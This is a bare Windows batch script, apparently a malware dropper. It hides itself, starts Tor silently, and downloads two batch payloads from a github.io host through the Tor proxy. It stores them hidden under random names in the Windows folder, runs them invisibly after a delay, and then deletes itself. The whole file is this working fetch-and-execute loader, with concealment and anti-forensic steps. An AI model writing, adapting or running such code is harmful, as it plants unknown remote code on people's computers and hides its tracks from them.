@echo off
attrib +s +h +i "%~f0"
:connectivitycheck
ping www.google.com -n 1 -w 5000 >NUL
if errorlevel 1 goto Connectivitycheck

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (echo) else (
  nircmd exec hide "%systemdrive%\Tor\tor.exe"
)

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (set "proxy=--tlsv1 --socks5-hostname 127.0.0.1:9050") else (
  set "proxy=--tlsv1"
)

set "win32=%random%"
set "win64=%random%"
curl.exe %proxy% https://cryptedlumos.github.io/win32.bat --output "%windir%\Win32\%win32%.bat" && attrib +s +h +i "%windir%\Win32\%win32%.bat"
curl.exe %proxy% https://cryptedlumos.github.io/win64.bat --output "%windir%\Win32\%win64%.bat" && attrib +s +h +i "%windir%\Win32\%win64%.bat"
timeout -t 300
nircmd exec hide "%windir%\Win32\%win32%.bat"
nircmd exec hide "%windir%\Win32\%win64%.bat"
DEL /s /f /q /a "%~f0"
